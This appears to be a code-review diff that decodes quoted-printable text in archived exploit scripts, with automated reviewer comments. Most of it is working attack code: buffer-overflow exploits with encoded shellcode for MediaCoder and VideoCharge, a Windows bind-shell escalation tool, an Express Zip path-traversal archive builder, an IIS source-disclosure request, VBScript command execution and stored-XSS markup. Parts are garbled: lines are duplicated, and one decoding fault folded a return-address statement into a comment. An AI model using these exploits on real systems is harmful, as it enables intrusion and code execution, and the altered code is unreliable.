pass[i]=3Dex_order[ (hash[i] - except[i]) ]; }
if(hash[0] >= '!' && hash[0] <= '&')
hash[0]=(hash[0] - 0x20) + 0x7e;
for(i=0;i<8;i++) {
if(hash[i] >= except[i] && hash[i] <= (except[i] + 6) ) {
pass[i]=ex_order[ (hash[i] - except[i]) ]; }
else {
if(hash[i] < start[i]) {
hash[i]+=3D0x5e;
}
pass[i]=3Dhash[i] - start[i] + '!';
if(hash[i] < start[i]) {
hash[i]+=0x5e;
}
pass[i]=hash[i] - start[i] + '!';
if(pass[i] >=3D 'B')
pass[i]+=3D1;
if(pass[i] >=3D 'L')
pass[i]+=3D1;
if(pass[i] >=3D 'O')
pass[i]+=3D1;
if(pass[i] >=3D 'R')
pass[i]+=3D1;
if(pass[i] >=3D 'm')
pass[i]+=3D1;
if(pass[i] >=3D 's')
pass[i]+=3D1;
if(pass[i] >=3D 't')
pass[i]+=3D1;
if(pass[i] >= 'B')
pass[i]+=1;
if(pass[i] >= 'L')
pass[i]+=1;
if(pass[i] >= 'O')
pass[i]+=1;
if(pass[i] >= 'R')
pass[i]+=1;
if(pass[i] >= 'm')
pass[i]+=1;
if(pass[i] >= 's')
pass[i]+=1;
if(pass[i] >= 't')
pass[i]+=1;
}
}
printf("The password is:\n\t");
for(i=3D0;i<8;i++) {
for(i=0;i<8;i++) {
printf("%c ", pass[i]);
}
printf("\n");


@ -71,7 +71,7 @@ restriction.
* 1140 explorer.exe Program Manager
*
* C:\>c:\keybd.exe 1140
* HANDLE Found. Attacking =3D)
* HANDLE Found. Attacking =)
*
* C:\>nc localhost 65535
* Microsoft Windows 2000 [Versi=F3n 5.00.2195]
@ -82,7 +82,7 @@ restriction.
* AQUARIUS\Administrador
*
*
* DONE =3D)
* DONE =)
*
*/
@ -92,8 +92,8 @@ restriction.
#pragma comment(lib, "ws2_32.lib")
#define HAXORCITOS 65535
unsigned int pid =3D 0;
char buf[256]=3D"";
unsigned int pid = 0;
char buf[256]="";
/**************************************************************/
void ExplorerExecution (HWND hwnd, LPARAM lParam){
@ -103,24 +103,24 @@ int i;
GetWindowThreadProcessId(hwnd,&hwndid);
if (hwndid =3D=3D pid){
if (hwndid == pid){
/*
Replace keybd_event with SendMessage() and PostMessage() calls=20
*/
printf("HANDLE Found. Attacking =3D)\n");
printf("HANDLE Found. Attacking =)\n");
SetForegroundWindow(hwnd);
keybd_event(VK_LWIN,1,0,0);
keybd_event(VkKeyScan('r'),1,0,0);
keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
for(i=3D0;i<strlen(buf);i++) {
if (buf[i]=3D=3D':') {
for(i=0;i<strlen(buf);i++) {
if (buf[i]==':') {
keybd_event(VK_SHIFT,1,0,0);
keybd_event(VkKeyScan(buf[i]),1,0,0);
keybd_event(VK_SHIFT,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan(buf[i]),1,KEYEVENTF_KEYUP,0);
} else {
if (buf[i]=3D=3D'\\') {
if (buf[i]=='\\') {
keybd_event(VK_LMENU,1,0,0);
keybd_event(VK_CONTROL,1,0,0);
keybd_event(VkKeyScan('=BA'),1,0,0);
@ -149,29 +149,29 @@ WSADATA HWSAdata;
struct sockaddr_in sa;
int len;
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) !=3D 0) { exit(1); }
if ((s=3DWSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))=3D=3DINVALID_SOC=
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) { exit(1); }
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0))==INVALID_SOC=
KET){=20
exit(1); }
sa.sin_family =3D AF_INET;
sa.sin_port =3D (USHORT)htons(HAXORCITOS);
sa.sin_addr.s_addr =3D htonl(INADDR_ANY);
len=3Dsizeof(sa);
if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) =3D=3D SOCKET_ERROR ) {=
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(HAXORCITOS);
sa.sin_addr.s_addr = htonl(INADDR_ANY);
len=sizeof(sa);
if ( bind(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {=
=20
return(-1); }
if ( listen(s, 1) =3D=3D SOCKET_ERROR ) { return(-1); }
s2 =3D accept(s,(struct sockaddr *)&sa,&len);
if ( listen(s, 1) == SOCKET_ERROR ) { return(-1); }
s2 = accept(s,(struct sockaddr *)&sa,&len);
closesocket(s);
ZeroMemory( &si, sizeof(si) ); ZeroMemory( &pi, sizeof(pi) );
si.cb =3D sizeof(si);
si.wShowWindow =3D SW_HIDE;
si.dwFlags =3DSTARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput =3D (void *) s2; // SOCKET
si.hStdOutput =3D (void *) s2;
si.hStdError =3D (void *) s2;
si.cb = sizeof(si);
si.wShowWindow = SW_HIDE;
si.dwFlags =STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.hStdInput = (void *) s2; // SOCKET
si.hStdOutput = (void *) s2;
si.hStdError = (void *) s2;
if (!CreateProcess( NULL ,"cmd.exe",NULL, NULL,TRUE, 0,NULL,NULL,&si,&pi)) =
{
doFormatMessage(GetLastError());
@ -190,10 +190,10 @@ return(1);
/**************************************************************/
void main(int argc, char* argv[])
{
HWND console_wnd =3D NULL;
HWND console_wnd = NULL;
if (argc >=3D 2) {
pid =3D atoi (argv[1]);
if (argc >= 2) {
pid = atoi (argv[1]);
strncpy(buf,argv[0],sizeof(buf)-1);
EnumWindows((WNDENUMPROC)ExplorerExecution,(long)(&console_wnd));
} else {


@ -48,7 +48,7 @@ my $junk = "A" x 21;
# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=3DEAX
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
@ -97,7 +97,7 @@ $allign2 = $allign2."\xc3"; # RETN
# msfpayload windows/messagebox
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=3DEAX
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .


@ -2,28 +2,25 @@
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com=20
# email: kwiha2003 [at ]yahoo [dot] com
# Version: 0.8.34.5716
# Tested on: Win XP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
info&file=3DMediaCoder-0.8.34.5716.exe
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insifficient space after taking control of the EIP, you hav=
e to jump backwards and also=20
# Notes: Due to insifficient space after taking control of the EIP, you have to jump backwards and also
# avoid a few bad bytes after the "A"s.
#!/usr/bin/python
buffersize =3D 853
buffer =3D ("http://" + "\x41" * 256)
buffersize = 853
buffer = ("http://" + "\x41" * 256)
#Space for shellcode to decode
buffer +=3D "\x90" * 24
# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\x00\x0a\x0d\x20" -t c=
-e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
#unsigned char buf[] =3D=20
buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
buffer += "\x90" * 24
# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
#unsigned char buf[] =
buffer +=("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
@ -38,13 +35,13 @@ buffer +=3D("\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae")
buffer +=3D "\x42" * 350
nseh =3D "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]=20
seh=3D"\xee\x04\x01\x66"
buffer += "\x42" * 350
nseh = "\xEB\x06\x90\x90"
# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]
seh="\xee\x04\x01\x66"
#Jump back 603 bytes due to insufficient space for shellcode
jmpbck =3D "\xe9\xA5\xfd\xff\xff"
junk =3D ("D" * 55)=20
f=3D open("exploit.m3u",'w')
jmpbck = "\xe9\xA5\xfd\xff\xff"
junk = ("D" * 55)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + jmpbck + junk)
f.close()


@ -2,19 +2,17 @@
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.16.3.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com=20
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.16.3.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Conv=
erter-DIVX-Related/Videocharge-Express.shtml#download
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Express.shtml#download
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# Looks like the whole productline is messed. Same sploit for all ver=
sions
# Looks like the whole productline is messed. Same sploit for all versions
#
import struct
header =3D (
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
@ -33,7 +31,7 @@ header =3D (
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer =3D (
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
@ -280,15 +278,13 @@ footer =3D (
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize =3D 1000
payload =3D "\x41" * 230
# JMP ESP [urlmon.dll]
payload +=3D struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=3Dcalc R |msfencode BufferRegister=3DESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=3D1)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload +=3D (
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
@ -322,16 +318,16 @@ payload +=3D (
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload +=3D "\x41" * (buffersize - len(payload))=20
sploit =3D header + payload + footer
=20
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
=20
try:
=09print "[+]Creating Exploit File...\n"
=09file =3D open("noname1.vcc","wb")=20
=09file.write(sploit)
=09file.close
=09print "[+]File noname1.vcc create successfully.\n"
except:=09
=09print "**[-]Error: #{$!}\n"
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"
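Review bot: The decode merged the comment `# JMP ESP [urlmon.dll]` with the statement that followed it, so the new side reads `# JMP ESP [urlmon.dll]payload += struct.pack("<L",0x781c2014 )` and that assignment is now part of the comment; the later padding line `payload += "\x41" * (buffersize - len(payload))` hides the difference, so the file the script writes no longer matches what the archived original produced. The same merge happened in the next VideoCharge file (v3.18.4.04), while the third one (v3.16.4.06) keeps the comment and the `payload += struct.pack(...)` statement on separate lines, which is the form both should have. Restore the two lines as `# JMP ESP [urlmon.dll]` followed by `payload += struct.pack("<L",0x781c2014 )`. Unrelated to the decode, `file.close` without parentheses is an attribute access rather than a call, though the handle is released at interpreter exit anyway.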


@ -2,24 +2,20 @@
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.18.4.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com=20
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.18.4.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Conv=
erter-DIVX-Related/Videocharge-Full.shtml
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Full.shtml
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# All third party modules are SAFESEH'ed
# A bigger buffer of > 1000 & <3000 A's will also crash the program =
but you'd have to
# use the SEH route which will make for a good exercise since the pr=
ogram only
# ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+=
ret, jmp[reg] or call[reg] )
# A bigger buffer of > 1000 & <3000 A's will also crash the program but you'd have to
# use the SEH route which will make for a good exercise since the program only
# ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+ret, jmp[reg] or call[reg] )
#
import struct
header =3D (
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
@ -38,7 +34,7 @@ header =3D (
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer =3D (
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
@ -285,15 +281,13 @@ footer =3D (
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize =3D 1000
payload =3D "\x41" * 230
# JMP ESP [urlmon.dll]
payload +=3D struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=3Dcalc R |msfencode BufferRegister=3DESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=3D1)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload +=3D (
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
@ -327,16 +321,16 @@ payload +=3D (
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload +=3D "\x41" * (buffersize - len(payload))=20
sploit =3D header + payload + footer
=20
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
=20
try:
=09print "[+]Creating Exploit File...\n"
=09file =3D open("noname1.vcc","wb")=20
=09file.write(sploit)
=09file.close
=09print "[+]File noname1.vcc create successfully.\n"
except:=09
=09print "**[-]Error: #{$!}\n"
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"


@ -2,7 +2,7 @@
# Exploit Title: VideoCharge v3.16.4.06
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com=20
# email: kwiha2003 [at] yahoo [dot] com
# Version: 3.16.4.06
# Tested on: Win XP3
# Software link: http://www.softpedia.com/dyn-postdownload.php/36f0ea5a24f3=
@ -19,7 +19,7 @@ ogram only
ret, jmp[reg] or call[reg] )
#
import struct
header =3D (
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
@ -38,7 +38,7 @@ header =3D (
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer =3D (
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
@ -285,15 +285,15 @@ footer =3D (
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize =3D 1000
payload =3D "\x41" * 230
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]
payload +=3D struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=3Dcalc R |msfencode BufferRegister=3DESP -e x=
payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x=
86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=3D1)
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload +=3D (
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
@ -327,16 +327,16 @@ payload +=3D (
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload +=3D "\x41" * (buffersize - len(payload))=20
sploit =3D header + payload + footer
=20
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
=20
try:
=09print "[+]Creating Exploit File...\n"
=09file =3D open("noname1.vcc","wb")=20
=09file.write(sploit)
=09file.close
=09print "[+]File noname1.vcc create successfully.\n"
except:=09
=09print "**[-]Error: #{$!}\n"
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"


@ -0,0 +1,40 @@
#!/usr/bin/python -w
# Title : Express Zip <= 2.40 Path Traversal
# Date : 07/04/2016
# Author : R-73eN
# Tested on : Windows Xp / Windows 7 Ultimate
# Software Link : http://www.nchsoftware.com/zip/
# Download Link: http://www.nchsoftware.com/zip/zipplus.exe
# Vulnerable Versions : Express Zip <= 2.40
# Express Zip doesn't validates " ..\ " which makes possible
# to do a path traversal attack which can be converted easily to RCE
# How to Reproduce:
# 1- Run Exploit
# 2- Right Click evil.zip go to Express Zip and click Extract Here
# 3- File will be extracted to the root of the partition in this case C:\POC.txt
# This quick and dirt code is written only for demonstration purposes.
# If you wanna profit from it you must modify it.
# Video: https://www.youtube.com/watch?v=kb43h8Hoo0o
#
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import zipfile, sys
if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile("evil.zip", "w")
zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt")
zf.close()
print "[+] Created evil.zip successfully [+]"
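Review bot: The usage branch calls `exit(0)`, which reports success to the caller even though no archive was produced; `sys.exit(1)` is the conventional value, and the usage text belongs on stderr (`print >>sys.stderr, "..."` in this Python 2 script). As a point of style, `import zipfile, sys` sits in the middle of the script after the banner is printed; imports conventionally go at the top, directly after the header comment.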


@ -372,7 +372,7 @@ class Metasploit3 < Msf::Exploit::Remote
def create_email_body_html(body, subject)
body = body.gsub(/\\[nr]/, "<BR>\n")
body = body.gsub(/\\t/, "&nbsp;&nbsp;&nbsp;")
body = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=3D\"Content-Type\" CONTENT=3D\"text/html; charset=3Diso-8859-=\n1\">\n<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
body = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=iso-8859-=\n1\">\n<TITLE>" << subject << "</TITLE>\n</HEAD>\n<BODY>\n" << body << "\n<BR><BR>\n</BODY>\n</HTML>"
return body
end
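Review bot: The new string literal still contains `=\n` right after `charset=iso-8859-`, which is a quoted-printable soft line break, while the `=3D` sequences in the same literal were decoded to `=`. If this HTML was meant to be emitted as quoted-printable (the soft break suggests so, and the body is built for an e-mail), decoding `=3D` turns valid QP into bare `=` characters inside the encoded body and should be reverted; if it was meant to be plain HTML, the `=\n` should be removed as well. The literal should be consistently one or the other, and the module's Content-Transfer-Encoding header, not visible here, decides which. The whole of create_email_body_html is within the hunk.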


@ -23,23 +23,23 @@ http://www.victim.com/default.asp > file_to_save
~; exit;}
$victimurl=3D$ARGV[0];
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua =3D new LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request
my $req =3D new HTTP::Request GET =3D> $victimurl . '\\'; # Here =
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here =
is the backslash at the end of the url ;)
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate =3D> 'f'); # Here is the famous translate =
$req->header(Translate => 'f'); # Here is the famous translate =
header :))
$req->content('match=3Dwww&errors=3D0');
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res =3D $ua->request($req);
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {


@ -39,8 +39,8 @@ btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtf
-->
<title>YOU ARE VULNERABLE</title>
<script language=3Dvbscript>set btf=3Dcreateobject("wscript.shell")=
:btf.run("calc")</script><body style=3D"background-color:red;font-si=
<script language=vbscript>set btf=createobject("wscript.shell")=
:btf.run("calc")</script><body style="background-color:red;font-si=
ze:40px;"><b>YOU ARE VULNERABLE!!!</b><br><br><br>Regards,<br><br>
Benjamin Tobias Franz<br>Germany</body>
--btf--


@ -24,7 +24,7 @@ Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<title>Test XSS of uploaded documents</title>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Diso-8859-1">
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
</HEAD>
<BODY>


@ -230,28 +230,28 @@ Code Review:
<TH noWrap>Last Sold</TH>
<TH noWrap>Stock First Arrival</TH></TR>
<TR>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>[PERSISTENT INJECTED SCRIPT CODE!]'=20
src=3D"res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=3Dtop>=A31.00</TD>
<TD vAlign=3Dtop>10</TD>
<TD vAlign=3Dtop>10</TD>
<TD vAlign=3Dtop>0</TD>
<TD vAlign=3Dtop>0</TD>
<TD vAlign=3Dtop>0</TD>
<TD vAlign=3Dtop>=A312.00</TD>
<TD vAlign=3Dtop> </TD>
<TD vAlign=3Dtop> </TD>
<TD vAlign=3Dtop> </TD>
<TD vAlign=3Dtop>12/24/2012</TD></TR>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>[PERSISTENT INJECTED SCRIPT CODE!]'
src="res://ieframe.dll/dnserrordiagoff_webOC.htm"></IFRAME></TD>
<TD vAlign=top>=A31.00</TD>
<TD vAlign=top>10</TD>
<TD vAlign=top>10</TD>
<TD vAlign=top>0</TD>
<TD vAlign=top>0</TD>
<TD vAlign=top>0</TD>
<TD vAlign=top>=A312.00</TD>
<TD vAlign=top> </TD>
<TD vAlign=top> </TD>
<TD vAlign=top> </TD>
<TD vAlign=top>12/24/2012</TD></TR>
<TR>
<TD vAlign=3Dtop>BBA123G</TD>
<TD vAlign=3Dtop>Angled Building Block</TD>
<TD vAlign=top>BBA123G</TD>
<TD vAlign=top>Angled Building Block</TD>
@ -264,76 +264,76 @@ Code Review:
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%">
<TD vAlign=top width="32%">
<P><STRONG>Fault Description</STRONG></P>
<P>Created: 12/25/2012</P></TD>
<TD vAlign=3Dtop width=3D"68%">
<TD vAlign=top width="68%">
=
[PERSISTENT INJECTED SCRIPT CODE!]</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD>
<TABLE=20
style=3D"BORDER-BOTTOM: #000000 1px solid; =
<TABLE
style="BORDER-BOTTOM: #000000 1px solid; =
BORDER-LEFT: #000000 1px solid; BORDER-TOP: #000000 1px solid; =
BORDER-RIGHT: #000000 1px solid"=20
border=3D0 cellSpacing=3D10 cellPadding=3D8 =
width=3D"100%">
BORDER-RIGHT: #000000 1px solid"
border=0 cellSpacing=10 cellPadding=8 =
width="100%">
<TBODY>
<TR>
<TD vAlign=3Dtop width=3D"32%">
